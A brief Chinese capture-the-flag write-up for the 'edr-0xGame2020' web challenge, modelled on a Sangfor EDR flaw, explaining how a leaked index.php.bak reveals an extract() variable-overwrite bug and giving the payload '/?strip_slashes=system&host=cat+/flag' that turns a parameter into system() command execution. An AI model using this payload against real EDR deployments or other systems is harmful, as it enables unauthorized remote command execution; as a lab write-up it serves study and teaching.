edr-0xGame2020

sean 2023-10-14 20:47:06 753 0


深信服EDR漏洞,原理参考:https://blog.csdn.net/qq_32393893/article/details/108077482

后台扫描存在index.php.bak,得到index.php源码后进行审计:存在extract变量覆盖,GET传入strip_slashes参数可以直接覆盖源码中的strip_slashes变量

//payload:/?strip_slashes=system&host=cat+/flag
extract($params);
$host  = isset($host)  ? $strip_slashes($host)  : "127.0.0.1";
//$strip_slashes($host)==system("cat /flag")


分类:WEB
image
作者:sean

27

提交

626

收入

相关WriteUP

  • sqli-0x1 Writeup

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • [HackINI-2022] lfi WriteUp

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • just-work-type

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • Fetus Web

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 7月前
  • post-the-get

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
问题反馈